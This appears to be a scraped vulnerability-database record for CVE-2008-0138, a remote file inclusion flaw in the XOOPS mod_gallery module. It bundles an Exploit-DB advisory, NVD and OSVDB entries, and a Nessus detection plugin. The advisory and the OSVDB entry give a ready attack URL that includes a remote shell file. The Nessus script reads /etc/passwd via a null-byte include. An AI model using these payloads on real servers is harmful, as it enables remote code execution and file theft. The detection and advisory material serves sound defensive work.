{"id": "EDB-ID:4847", "hash": "ac88d0b5580aecf0de5970241ca9e6f0", "type": "exploitdb", "bulletinFamily": "exploit", "title": "XOOPS mod_gallery Zend_Hash_key + Extract RFI Vulnerability", "description": "XOOPS mod_gallery Zend_Hash_key + Extract RFI Vulnerability. CVE-2008-0138. Webapps exploit for php platform", "published": "2008-01-06T00:00:00", "modified": "2008-01-06T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4847/", "reporter": "Eugene Minaev", "references": [], "cvelist": ["CVE-2008-0138"], "lastseen": "2016-01-31T21:54:38", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0138"]}, {"type": "nessus", "idList": ["XOOPSGALLERY_GALLERY_BASEDIR_FILE_INCLUDES.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:40214"]}], "modified": "2016-01-31T21:54:38"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4847/", "sourceData": "----[ XOOPS mod_gallery Zend_Hash_key + Extract RFI ... ITDefence.ru Antichat.ru ]\n\n\t\t\t\t\t\tXOOPS mod_gallery Zend_Hash_key + Extract REMOTE FILE INCLUDE\n\t\t\t\t\t\t\tEugene Minaev underwater@itdefence.ru\n\t\t\t\t___________________________________________________________________\n\t\t\t____/ __ __ _______________________ _______ _______________ \\ \\ \\\n\t\t\t/ .\\ / /_// // / \\ \\/ __ \\ /__/ /\n\t\t\t/ / /_// /\\ / / / / /___/\n\t\t\t\\/ / / / / /\\ / / /\n\t\t\t/ / \\/ / / / / /__ //\\\n\t\t\t\\ / ____________/ / \\/ __________// /__ // / \n\t\t\t/\\\\ \\_______/ \\________________/____/ 2007 /_//_/ // //\\\n\t\t\t\\ \\\\ // // /\n\t\t\t.\\ \\\\ -[ ITDEFENCE.ru Security advisory ]- // // / . \n\t\t\t. \\_\\\\________[________________________________________]_________//_//_/ . .\n\t\t \n\t\t\n\t\tBug works only with register_globals = OFF . I find their security fix very fun , and you ? : )\n\t\t\n\t\t<?php\n\t\t/* Begin Security Fix */\n\t\t$scrubList = array('HTTP_GET_VARS', 'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_POST_FILES');\n\t\tforeach ($scrubList as $outer) \n\t\t{\n\t\t\tforeach ($scrubList as $inner) \n\t\t\t{\n\t\t\t\tif (isset(${$outer}[$inner])) \n\t\t\t\t{\n\t\t\t\t\tunset(${$outer}[$inner]);\n\t\t\t\t}\n\t\t\t}\n\t\t} \n\t\t....some php code...\n\t\t/* End Security Fix */\n\t\textract($_GET);\n\t\textract($_POST);\n\t\textract($_COOKIE); \n\t\t?>\n\t\t\n\t\tHah .. very serious security fix , yeah :) \n\t\t\n\t\t<?php\n\t\tif (substr(PHP_OS, 0, 3) == 'WIN') {\n\t\trequire_once($GALLERY_BASEDIR . \"platform/fs_win32.php\");\n\t\t} else {\n\t\trequire_once($GALLERY_BASEDIR . \"platform/fs_unix.php\");\n\t\t} \n\t\t?>\n\t\t\n\t\tzend_hash_key_calc.exe GALLERY_BASEDIR\n\t\t\n\t\tGALLERY_BASEDIR\n\t\tPHP5 hash: -2093085906\n\t\tPHP4 hash: -995617320\n\t\t\n\t\ttest.ru/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://path/to/m0nzt3r_shell.txt?&2093085906=1&995617320=2\n\t\t\n\n----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]\n\n# milw0rm.com [2008-01-06]\n", "osvdbidlist": ["40214"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-09-29T14:25:42", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in xoopsgallery/init_basic.php in the mod_gallery module for XOOPS, when register_globals is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the GALLERY_BASEDIR parameter.", "modified": "2017-09-28T21:30:08", "published": "2008-01-08T14:46:00", "id": "CVE-2008-0138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0138", "title": "CVE-2008-0138", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:10:36", "bulletinFamily": "scanner", "description": "The remote host is running XoopsGallery, a third-party module for Xoops. \n\nThe version of XoopsGallery installed on the remote host fails to sanitize user-supplied input to the 'GALLERY_BASEDIR' parameter of the 'modules/xoopsgallery/init_basic.php' script before using it to include PHP code. Provided PHP's 'register_globals' setting is off, an unauthenticated, remote attacker may be able to exploit this issue to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "modified": "2018-08-07T00:00:00", "id": "XOOPSGALLERY_GALLERY_BASEDIR_FILE_INCLUDES.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29870", "published": "2008-01-08T00:00:00", "title": "XoopsGallery init_basic.php GALLERY_BASEDIR Parameter Remote File Inclusion", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29870);\n script_version(\"1.18\");\n\n script_cve_id(\"CVE-2008-0138\");\n script_bugtraq_id(27155);\n script_xref(name:\"EDB-ID\", value:\"4847\");\n\n script_name(english:\"XoopsGallery init_basic.php GALLERY_BASEDIR Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file with XoopsGallery\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is prone to a remote\nfile include attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running XoopsGallery, a third-party module for\nXoops. \n\nThe version of XoopsGallery installed on the remote host fails to\nsanitize user-supplied input to the 'GALLERY_BASEDIR' parameter of the\n'modules/xoopsgallery/init_basic.php' script before using it to\ninclude PHP code. Provided PHP's 'register_globals' setting is off,\nan unauthenticated, remote attacker may be able to exploit this issue\nto view arbitrary files on the remote host or to execute arbitrary PHP\ncode, possibly taken from third-party hosts.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(89);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/01/08\");\n script_cvs_date(\"Date: 2018/08/07 16:46:49\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:xoops:xoopsgallery_module\");\nscript_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"xoops_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/xoops\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/xoops\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches))\n{\n dir = matches[2];\n\n # Try to retrieve a local file.\n file = \"/etc/passwd\";\n\n r = http_send_recv3(method:\"GET\", port: port, \n item:string(\n dir, \"/modules/xoopsgallery/init_basic.php?\", \n \"GALLERY_BASEDIR=\", file, \"%00\"\n ));\n if (isnull(r)) exit(0);\n res = r[2];\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error because magic_quotes was enabled or...\n string(\"main(\", file, \"\\\\0platform/fs_\") >< res ||\n # we get an error claiming the file doesn't exist or...\n string(\"main(\", file, \"): failed to open stream: No such file\") >< res ||\n # we get an error about open_basedir restriction.\n string(\"open_basedir restriction in effect. File(\", file) >< res\n )\n {\n if (egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = res - strstr(res, '<br');\n contents = data_protection::redact_etc_passwd(output:contents);\n report = string(\n \"Here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n\n exit(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:36", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://path/to/m0nzt3r_shell.txt?&2093085906=1&995617320=2\n## References:\nISS X-Force ID: 39461\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4847\n[CVE-2008-0138](https://vulners.com/cve/CVE-2008-0138)\nBugtraq ID: 27155\n", "modified": "2008-01-06T00:00:00", "published": "2008-01-06T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:40214", "id": "OSVDB:40214", "title": "mod_gallery Module for XOOPS xoopsgallery/init_basic.php GALLERY_BASEDIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}